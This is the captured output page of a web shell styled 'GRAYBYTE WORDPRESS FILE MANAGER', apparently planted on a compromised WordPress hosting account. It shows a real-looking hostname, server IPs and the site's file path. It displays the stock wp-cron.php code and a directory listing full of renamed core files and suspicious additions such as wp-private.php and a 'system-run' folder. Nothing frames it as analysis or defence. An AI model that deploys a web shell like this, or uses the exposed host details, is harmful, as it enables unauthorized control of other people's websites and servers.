✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium134.web-hosting.com ​🇻​♯➤ 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 162.0.232.104 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.14
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/raydofqv/ctcom.com.tw//wp-cron-20260609102244.php
<?php
/**
 * A pseudo-cron daemon for scheduling WordPress tasks.
 *
 * WP-Cron is triggered when the site receives a visit. In the scenario
 * where a site may not receive enough visits to execute scheduled tasks
 * in a timely manner, this file can be called directly or via a server
 * cron daemon for X number of times.
 *
 * Defining DISABLE_WP_CRON as true and calling this file directly are
 * mutually exclusive and the latter does not rely on the former to work.
 *
 * The HTTP request to this file will not slow down the visitor who happens to
 * visit when a scheduled cron event runs.
 *
 * @package WordPress
 */

ignore_user_abort( true );

if ( ! headers_sent() ) {
	header( 'Expires: Wed, 11 Jan 1984 05:00:00 GMT' );
	header( 'Cache-Control: no-cache, must-revalidate, max-age=0' );
}

// Don't run cron until the request finishes, if possible.
if ( function_exists( 'fastcgi_finish_request' ) ) {
	fastcgi_finish_request();
} elseif ( function_exists( 'litespeed_finish_request' ) ) {
	litespeed_finish_request();
}

if ( ! empty( $_POST ) || defined( 'DOING_AJAX' ) || defined( 'DOING_CRON' ) ) {
	die();
}

/**
 * Tell WordPress the cron task is running.
 *
 * @var bool
 */
define( 'DOING_CRON', true );

if ( ! defined( 'ABSPATH' ) ) {
	/** Set up WordPress environment */
	require_once __DIR__ . '/wp-load.php';
}

// Attempt to raise the PHP memory limit for cron event processing.
wp_raise_memory_limit( 'cron' );

/**
 * Retrieves the cron lock.
 *
 * Returns the uncached `doing_cron` transient.
 *
 * @ignore
 * @since 3.3.0
 *
 * @global wpdb $wpdb WordPress database abstraction object.
 *
 * @return string|int|false Value of the `doing_cron` transient, 0|false otherwise.
 */
function _get_cron_lock() {
	global $wpdb;

	$value = 0;
	if ( wp_using_ext_object_cache() ) {
		/*
		 * Skip local cache and force re-fetch of doing_cron transient
		 * in case another process updated the cache.
		 */
		$value = wp_cache_get( 'doing_cron', 'transient', true );
	} else {
		$row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", '_transient_doing_cron' ) );
		if ( is_object( $row ) ) {
			$value = $row->option_value;
		}
	}

	return $value;
}

$crons = wp_get_ready_cron_jobs();
if ( empty( $crons ) ) {
	die();
}

$gmt_time = microtime( true );

// The cron lock: a unix timestamp from when the cron was spawned.
$doing_cron_transient = get_transient( 'doing_cron' );

// Use global $doing_wp_cron lock, otherwise use the GET lock. If no lock, try to grab a new lock.
if ( empty( $doing_wp_cron ) ) {
	if ( empty( $_GET['doing_wp_cron'] ) ) {
		// Called from external script/job. Try setting a lock.
		if ( $doing_cron_transient && ( $doing_cron_transient + WP_CRON_LOCK_TIMEOUT > $gmt_time ) ) {
			return;
		}
		$doing_wp_cron        = sprintf( '%.22F', microtime( true ) );
		$doing_cron_transient = $doing_wp_cron;
		set_transient( 'doing_cron', $doing_wp_cron );
	} else {
		$doing_wp_cron = $_GET['doing_wp_cron'];
	}
}

/*
 * The cron lock (a unix timestamp set when the cron was spawned),
 * must match $doing_wp_cron (the "key").
 */
if ( $doing_cron_transient !== $doing_wp_cron ) {
	return;
}

foreach ( $crons as $timestamp => $cronhooks ) {
	if ( $timestamp > $gmt_time ) {
		break;
	}

	foreach ( $cronhooks as $hook => $keys ) {

		foreach ( $keys as $k => $v ) {

			$schedule = $v['schedule'];

			if ( $schedule ) {
				$result = wp_reschedule_event( $timestamp, $schedule, $hook, $v['args'], true );

				if ( is_wp_error( $result ) ) {
					error_log(
						sprintf(
							/* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */
							__( 'Cron reschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ),
							$hook,
							$result->get_error_code(),
							$result->get_error_message(),
							wp_json_encode( $v )
						)
					);

					/**
					 * Fires if an error happens when rescheduling a cron event.
					 *
					 * @since 6.1.0
					 *
					 * @param WP_Error $result The WP_Error object.
					 * @param string   $hook   Action hook to execute when the event is run.
					 * @param array    $v      Event data.
					 */
					do_action( 'cron_reschedule_event_error', $result, $hook, $v );
				}
			}

			$result = wp_unschedule_event( $timestamp, $hook, $v['args'], true );

			if ( is_wp_error( $result ) ) {
				error_log(
					sprintf(
						/* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */
						__( 'Cron unschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ),
						$hook,
						$result->get_error_code(),
						$result->get_error_message(),
						wp_json_encode( $v )
					)
				);

				/**
				 * Fires if an error happens when unscheduling a cron event.
				 *
				 * @since 6.1.0
				 *
				 * @param WP_Error $result The WP_Error object.
				 * @param string   $hook   Action hook to execute when the event is run.
				 * @param array    $v      Event data.
				 */
				do_action( 'cron_unschedule_event_error', $result, $hook, $v );
			}

			/**
			 * Fires scheduled events.
			 *
			 * @ignore
			 * @since 2.1.0
			 *
			 * @param string $hook Name of the hook that was scheduled to be fired.
			 * @param array  $args The arguments to be passed to the hook.
			 */
			do_action_ref_array( $hook, $v['args'] );

			// If the hook ran too long and another cron process stole the lock, quit.
			if ( _get_cron_lock() !== $doing_wp_cron ) {
				return;
			}
		}
	}
}

if ( _get_cron_lock() === $doing_wp_cron ) {
	delete_transient( 'doing_cron' );
}

die();


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
4 Jun 2026 8.19 PM
raydofqv / raydofqv
0711
426f5f9d
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
IXR
--
10 Jun 2026 8.25 AM
raydofqv / raydofqv
0755
SimplePie
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
Text
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
assets
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
base-pid
--
9 Jun 2026 4.24 AM
raydofqv / raydofqv
0755
block-bindings
--
10 Jun 2026 3.18 AM
raydofqv / raydofqv
0755
block-patterns
--
10 Jun 2026 7.14 AM
raydofqv / raydofqv
0755
blocks
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
build-yarn-cache
--
9 Jun 2026 8.34 AM
raydofqv / raydofqv
0755
collaboration
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
css
--
10 Jun 2026 4.20 AM
raydofqv / raydofqv
0755
health-temp
--
10 Jun 2026 10.26 AM
raydofqv / raydofqv
0755
html-api
--
10 Jun 2026 10.43 AM
raydofqv / raydofqv
0755
images
--
10 Jun 2026 1.30 PM
raydofqv / raydofqv
0755
images-20260610014457
--
10 Jun 2026 1.44 AM
raydofqv / raydofqv
0755
js
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
l10n
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
old
--
10 Jun 2026 12.41 PM
raydofqv / raydofqv
0755
old-20260609211549
--
10 Jun 2026 1.06 PM
raydofqv / raydofqv
0755
php-ai-client
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
pipe-core
--
10 Jun 2026 1.06 PM
raydofqv / raydofqv
0755
pomo
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
profile-wp-lib
--
9 Jun 2026 9.40 AM
raydofqv / raydofqv
0755
rest-api
--
10 Jun 2026 4.33 AM
raydofqv / raydofqv
0755
sitemaps
--
10 Jun 2026 5.21 AM
raydofqv / raydofqv
0755
sodium_compat
--
5 Jun 2026 6.28 AM
raydofqv / raydofqv
0755
system-run
--
10 Jun 2026 1.09 PM
raydofqv / raydofqv
0755
trace-archive
--
9 Jun 2026 4.05 AM
raydofqv / raydofqv
0755
wp-admin
--
10 Jun 2026 1.13 PM
raydofqv / raydofqv
0755
wp-admin-20260609042420
--
9 Jun 2026 4.24 AM
raydofqv / raydofqv
0755
wp-content
--
10 Jun 2026 9.24 AM
raydofqv / raydofqv
0755
wp-content-20260609215636
--
9 Jun 2026 9.56 PM
raydofqv / raydofqv
0755
wp-includes
--
10 Jun 2026 1.10 PM
raydofqv / raydofqv
0755
wp-includes-20260609125807
--
9 Jun 2026 12.58 PM
raydofqv / raydofqv
0755
-20260609050732.litespeed_flag
0.29 KB
9 Jun 2026 1.36 AM
raydofqv / raydofqv
0644
-20260609191526.hcflag
0.029 KB
8 Jun 2026 11.30 PM
raydofqv / raydofqv
0644
.htaccess
1.997 KB
9 Jun 2026 3.57 AM
raydofqv / raydofqv
0444
error_log
2.15 MB
10 Jun 2026 1.02 PM
raydofqv / raydofqv
0644
error_log-20260609221216.
0.225 KB
9 Jun 2026 8.19 AM
raydofqv / raydofqv
0644
license-20260609082240.txt
19.437 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
profile.php
69.722 KB
9 Jun 2026 5.02 AM
raydofqv / raydofqv
0644
readme-20260609154840.html
7.232 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
wp-activate-20260609060205.php
7.198 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
wp-blog-header-20260609054757.php
0.363 KB
5 Jun 2026 1.11 PM
raydofqv / raydofqv
0644
wp-comments-post-20260609102304.php
2.269 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
wp-config-sample-20260609073800.php
3.261 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
wp-config.php
3.228 KB
9 Jun 2026 3.57 AM
raydofqv / raydofqv
0644
wp-cron-20260609102244.php
5.684 KB
5 Jun 2026 1.12 PM
raydofqv / raydofqv
0644
wp-links-opml-20260609050805.php
2.435 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
wp-load-20260609151308.php
3.988 KB
5 Jun 2026 6.19 AM
raydofqv / raydofqv
0644
wp-load.php
3.988 KB
5 Jun 2026 6.19 AM
raydofqv / raydofqv
0644
wp-mail-20260609065552.php
8.522 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
wp-private.php
52.281 KB
8 Jun 2026 11.13 PM
raydofqv / raydofqv
0444
wp-settings-20260609062516.php
31.885 KB
5 Jun 2026 6.19 AM
raydofqv / raydofqv
0644
wp-signup-20260609151216.php
33.81 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
wp-trackback-20260609082252.php
5.092 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644
xmlrpc-20260609211720.php
3.13 KB
2 Jun 2026 6.01 AM
raydofqv / raydofqv
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF